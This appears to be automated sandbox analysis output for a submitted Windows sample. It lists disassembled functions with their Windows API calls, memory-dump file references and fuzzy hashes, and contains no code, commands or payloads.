                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2675159561-0
                                                                                                                  • Opcode ID: 7fe681a00daaa74a8619dc0c8528991b76f922498fde7348dfad1664b52e4f38
                                                                                                                  • Instruction ID: bb066e0b5db23870e454008fe9ca8f6ab8623e78f3d1aff3e5bf7483b9dc91f8
                                                                                                                  • Opcode Fuzzy Hash: 7fe681a00daaa74a8619dc0c8528991b76f922498fde7348dfad1664b52e4f38
                                                                                                                  • Instruction Fuzzy Hash: AB41F935600604AFD7109F18C885BE9BBEDFF45724F248595FD05AB291CB70AE41CBE1
                                                                                                                  Function 00B1CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B1DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B1CF22,?), ref: 00B1DDFD
                                                                                                                    • Part of subcall function 00B1DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B1CF22,?), ref: 00B1DE16
                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00B1CF45
                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00B1CF7F
                                                                                                                  • _wcslen.LIBCMT ref: 00B1D005
                                                                                                                  • _wcslen.LIBCMT ref: 00B1D01B
                                                                                                                  • SHFileOperationW.SHELL32(?), ref: 00B1D061
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                  • String ID: \*.*
                                                                                                                  • API String ID: 3164238972-1173974218
                                                                                                                  • Opcode ID: d8fff306e5b39430295ac98b5c9ece97c36616ffebd55d658bb87d0488c3f13f
                                                                                                                  • Instruction ID: 628efb422f29ae71dd91ae29c3e56bfe1dedca4564de46b1141ace14f507f262
                                                                                                                  • Opcode Fuzzy Hash: d8fff306e5b39430295ac98b5c9ece97c36616ffebd55d658bb87d0488c3f13f
                                                                                                                  • Instruction Fuzzy Hash: DC4134719452195FDF12EFA4DA81ADEBBF9AF08340F5000E6E509EB142EA34E789CB50
                                                                                                                  Function 00B42DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B42E1C
                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00B42E4F
                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00B42E84
                                                                                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B42EB6
                                                                                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B42EE0
                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00B42EF1
                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B42F0B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LongWindow$MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2178440468-0
                                                                                                                  • Opcode ID: e50cfa18b5ede03cabaf2782766b0bddedca4ee84c3f36b9d7c59329834086c2
                                                                                                                  • Instruction ID: 38db736c9df45ebfb0ac895428e5a3ddb86e4e2840c08351b782aee4afde7b2d
                                                                                                                  • Opcode Fuzzy Hash: e50cfa18b5ede03cabaf2782766b0bddedca4ee84c3f36b9d7c59329834086c2
                                                                                                                  • Instruction Fuzzy Hash: AC311534686141AFDB20CF5CDC85F6537E4FB8AB10F9501A4F9148B2B2CB71AE41EB01
                                                                                                                  Function 00B17726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B17769
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B1778F
                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00B17792
                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00B177B0
                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00B177B9
                                                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00B177DE
                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00B177EC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3761583154-0
                                                                                                                  • Opcode ID: eb61d3beb0a9a01caea9a7eee82a8071f29b71c9e9d17f3bd1171a8b934088fc
                                                                                                                  • Instruction ID: c05c827434b7c065c646e11b7be10b65609b089e1de3818fa494c8c20266cdd8
                                                                                                                  • Opcode Fuzzy Hash: eb61d3beb0a9a01caea9a7eee82a8071f29b71c9e9d17f3bd1171a8b934088fc
                                                                                                                  • Instruction Fuzzy Hash: 0A21D13A604219AFDF00DFA8CC88CFB77ECFB09760B408065B915DB290DA70DD8187A0
                                                                                                                  Function 00B177FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B17842
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B17868
                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00B1786B
                                                                                                                  • SysAllocString.OLEAUT32 ref: 00B1788C
                                                                                                                  • SysFreeString.OLEAUT32 ref: 00B17895
                                                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00B178AF
                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00B178BD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3761583154-0
                                                                                                                  • Opcode ID: 94f27db5d197089d45e66866dc2b10bc5d1571db2b9c2a2fe874e0b92491c318
                                                                                                                  • Instruction ID: 8812ea51237ecb8821493df9baa96956770be9c7489497f361430a3ca9bb4505
                                                                                                                  • Opcode Fuzzy Hash: 94f27db5d197089d45e66866dc2b10bc5d1571db2b9c2a2fe874e0b92491c318
                                                                                                                  • Instruction Fuzzy Hash: 1321A936608204AF9B10AFA9CC8CDEA7BFCFB097607508065B915CB2A1DA74DD81CB74
                                                                                                                  Function 00B204D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00B204F2
                                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B2052E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateHandlePipe
                                                                                                                  • String ID: nul
                                                                                                                  • API String ID: 1424370930-2873401336
                                                                                                                  • Opcode ID: 89c670593ba2e4c2885fd71bceb7f6c27b1dfd2c46f195118ca353ec1eb640d4
                                                                                                                  • Instruction ID: 5ca439c289fb2fc03a10db3de627ca599fb381133414327e4ad6b436537196dd
                                                                                                                  • Opcode Fuzzy Hash: 89c670593ba2e4c2885fd71bceb7f6c27b1dfd2c46f195118ca353ec1eb640d4
                                                                                                                  • Instruction Fuzzy Hash: 0821B4746103199FCB20AF28EC84A9A7BF4FF55720F204A59F8A5D31E1D7B09940CF60
                                                                                                                  Function 00B205A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00B205C6
                                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B20601
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateHandlePipe
                                                                                                                  • String ID: nul
                                                                                                                  • API String ID: 1424370930-2873401336
                                                                                                                  • Opcode ID: b3bc4d1f8f1c0e9ea89729513dcdde6552447009632faed0e7712a7b7b4492a8
                                                                                                                  • Instruction ID: 6752d5a8542a22acc5156de34578ce5aee49c357287a8a132b30f855dd3b7a84
                                                                                                                  • Opcode Fuzzy Hash: b3bc4d1f8f1c0e9ea89729513dcdde6552447009632faed0e7712a7b7b4492a8
                                                                                                                  • Instruction Fuzzy Hash: 5021B5355103259FDB21AF68EC44A5A77F4FF95720F200A59F8A5E32E5DBB09960CB10
                                                                                                                  Function 00B440AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AB604C
                                                                                                                    • Part of subcall function 00AB600E: GetStockObject.GDI32(00000011), ref: 00AB6060
                                                                                                                    • Part of subcall function 00AB600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AB606A
                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B44112
                                                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B4411F
                                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B4412A
                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B44139
                                                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B44145
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                  • String ID: Msctls_Progress32
                                                                                                                  • API String ID: 1025951953-3636473452
                                                                                                                  • Opcode ID: d875c179de524c2be6b5faa18ae3fe2c7f0288af023493235caf26ead6d07672
                                                                                                                  • Instruction ID: b2d29577e8426096f3cbc090d6385c00fdb2abec3e205ed7f3773b7634e75a67
                                                                                                                  • Opcode Fuzzy Hash: d875c179de524c2be6b5faa18ae3fe2c7f0288af023493235caf26ead6d07672
                                                                                                                  • Instruction Fuzzy Hash: 0D11B6B114011DBEEF119F64CC85EE77F9DEF08798F018111BA18A6150CB729C21DBA4
                                                                                                                  Function 00AED7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AED7A3: _free.LIBCMT ref: 00AED7CC
                                                                                                                  • _free.LIBCMT ref: 00AED82D
                                                                                                                    • Part of subcall function 00AE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000), ref: 00AE29DE
                                                                                                                    • Part of subcall function 00AE29C8: GetLastError.KERNEL32(00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000,00000000), ref: 00AE29F0
                                                                                                                  • _free.LIBCMT ref: 00AED838
                                                                                                                  • _free.LIBCMT ref: 00AED843
                                                                                                                  • _free.LIBCMT ref: 00AED897
                                                                                                                  • _free.LIBCMT ref: 00AED8A2
                                                                                                                  • _free.LIBCMT ref: 00AED8AD
                                                                                                                  • _free.LIBCMT ref: 00AED8B8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                                  • Instruction ID: f894f3406d574476957c018d86e37cfdbe4108d26cdb96e5dce3b8309d30aa41
                                                                                                                  • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                                  • Instruction Fuzzy Hash: 53114271540B88BAD631BFF2CE47FCB7BDCAF44700F404825B699AA493DA79B5058760
                                                                                                                  Function 00B1DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B1DA74
                                                                                                                  • LoadStringW.USER32(00000000), ref: 00B1DA7B
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B1DA91
                                                                                                                  • LoadStringW.USER32(00000000), ref: 00B1DA98
                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B1DADC
                                                                                                                  Strings
                                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00B1DAB9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadModuleString$Message
                                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                  • API String ID: 4072794657-3128320259
                                                                                                                  • Opcode ID: 7930abcb2aa02d6b44bd430638d653d456a1ebef74f442b9ac5603f6433c5e63
                                                                                                                  • Instruction ID: 616a4ce5e47b0edbe41b82311d0a8fecfb1313657e53c7a836deb8f0e920e8b0
                                                                                                                  • Opcode Fuzzy Hash: 7930abcb2aa02d6b44bd430638d653d456a1ebef74f442b9ac5603f6433c5e63
                                                                                                                  • Instruction Fuzzy Hash: D70162F65002087FE790DBA09D89EF737ACEB09B01F404495B706E3041EA749E844F74
                                                                                                                  Function 00B2096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • InterlockedExchange.KERNEL32(017DD448,017DD448), ref: 00B2097B
                                                                                                                  • EnterCriticalSection.KERNEL32(017DD428,00000000), ref: 00B2098D
                                                                                                                  • TerminateThread.KERNEL32(00000000,000001F6), ref: 00B2099B
                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00B209A9
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B209B8
                                                                                                                  • InterlockedExchange.KERNEL32(017DD448,000001F6), ref: 00B209C8
                                                                                                                  • LeaveCriticalSection.KERNEL32(017DD428), ref: 00B209CF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3495660284-0
                                                                                                                  • Opcode ID: 87c72d2a63507ae869a0c896fb09370ed637c9194d290ff190a35e51f428a79c
                                                                                                                  • Instruction ID: dbe8e93059e19f520d6b702bba63a3643bff7b5d8dfa238079ffd3df87aace02
                                                                                                                  • Opcode Fuzzy Hash: 87c72d2a63507ae869a0c896fb09370ed637c9194d290ff190a35e51f428a79c
                                                                                                                  • Instruction Fuzzy Hash: 25F03131543912BBD7916F98EE8CBD67F35FF06B02F501015F102518A1CBB59565CF90
                                                                                                                  Function 00B31C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00B31DC0
                                                                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00B31DE1
                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00B31DF2
                                                                                                                  • htons.WSOCK32(?,?,?,?,?), ref: 00B31EDB
                                                                                                                  • inet_ntoa.WSOCK32(?), ref: 00B31E8C
                                                                                                                    • Part of subcall function 00B139E8: _strlen.LIBCMT ref: 00B139F2
                                                                                                                    • Part of subcall function 00B33224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00B2EC0C), ref: 00B33240
                                                                                                                  • _strlen.LIBCMT ref: 00B31F35
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3203458085-0
                                                                                                                  • Opcode ID: 236856e1225bad24fde17e0dc63db522b01a7bb09698354d3c283263a79f28fd
                                                                                                                  • Instruction ID: 44b23cfc4a31e6e62f75df7d6217364c64a0f3151573056b9accdd38eee093f0
                                                                                                                  • Opcode Fuzzy Hash: 236856e1225bad24fde17e0dc63db522b01a7bb09698354d3c283263a79f28fd
                                                                                                                  • Instruction Fuzzy Hash: 5FB1C130604340AFC324DF28C885E6A7BE9EF85318F64899CF4565B2A2DB71ED46CB91
                                                                                                                  Function 00AB5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00AB5D30
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00AB5D71
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00AB5D99
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00AB5ED7
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00AB5EF8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Rect$Client$Window$Screen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1296646539-0
                                                                                                                  • Opcode ID: 4121344bbd5434d054e3f73436bf66179f71e3cb683a1b63964605f47c5d23f3
                                                                                                                  • Instruction ID: ec9247311271a78463605ea483e92843d30f68666948a4770c2ed92d6c73cfd7
                                                                                                                  • Opcode Fuzzy Hash: 4121344bbd5434d054e3f73436bf66179f71e3cb683a1b63964605f47c5d23f3
                                                                                                                  • Instruction Fuzzy Hash: 2BB15538A00A4ADBDB10CFB9C4807EAB7F5BF58310F14851AE9A9D7250DB34EA51DB94
